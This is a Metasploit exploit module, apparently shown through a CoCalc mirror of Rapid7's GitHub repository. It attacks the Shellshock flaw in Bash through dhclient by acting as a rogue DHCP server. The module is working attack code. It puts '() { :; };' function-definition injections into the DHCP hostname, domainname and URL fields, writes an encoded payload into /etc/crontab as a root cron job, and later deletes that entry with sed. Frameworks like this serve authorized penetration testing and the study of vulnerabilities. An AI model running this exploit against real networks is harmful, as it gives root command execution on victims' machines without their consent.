Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/dhcp/bash_environment.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::DHCPServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',

16
        'Description' => %q{

17
          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell

18
          handles external environment variables. This module targets dhclient by responding

19
          to DHCP requests with a malicious hostname, domainname, and URL which are then

20
          passed to the configuration scripts as environment variables, resulting in code

21
          execution. Due to length restrictions and the unusual networking scenario at the

22
          time of exploitation, this module achieves code execution by writing the payload

23
          into /etc/crontab and then cleaning it up after a session is created.

24
        },

25
        'Author' => [

26
          'Stephane Chazelas', # Vulnerability discovery

27
          'egypt' # Metasploit module

28
        ],

29
        'License' => MSF_LICENSE,

30
        'Platform' => ['unix'],

31
        'Arch' => ARCH_CMD,

32
        'References' => [

33
          [ 'CVE', '2014-6271' ],

34
          [ 'CWE', '94' ],

35
          [ 'OSVDB', '112004' ],

36
          [ 'EDB', '34765' ],

37
          [ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],

38
          [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],

39
          [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]

40
        ],

41
        'Payload' => {

42
          # 255 for a domain name, minus some room for encoding

43
          'Space' => 200,

44
          'DisableNops' => true,

45
          'Compat' => {

46
            'PayloadType' => 'cmd',

47
            'RequiredCmd' => 'generic telnet ruby'

48
          }

49
        },

50
        'Targets' => [ [ 'Automatic Target', {}] ],

51
        'DefaultTarget' => 0,

52
        'DisclosureDate' => '2014-09-24',

53
        'Notes' => {

54
          'Stability' => [CRASH_SAFE],

55
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],

56
          'Reliability' => [REPEATABLE_SESSION],

57
          'AKA' => ['Shellshock']

58
        }

59
      )

60
    )

61


62
    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')

63


64
    self.needs_cleanup = true

65
  end

66


67
  def on_new_session(session)

68
    print_status 'Cleaning up crontab'

69
    # XXX this will brick a server some day

70
    session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")

71
  end

72


73
  def exploit

74
    hash = datastore.copy

75
    # Quotes seem to be completely stripped, so other characters have to be

76
    # escaped

77
    p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }

78
    echo = "echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"

79
    hash['DOMAINNAME'] = "() { :; };#{echo}"

80
    if hash['DOMAINNAME'].length > 255

81
      raise ArgumentError, 'payload too long'

82
    end

83


84
    hash['HOSTNAME'] = "() { :; };#{echo}"

85
    hash['URL'] = "() { :; };#{echo}"

86
    start_service(hash)

87


88
    sleep 2 while @dhcp.thread.alive?

89
  end

90
end

91


92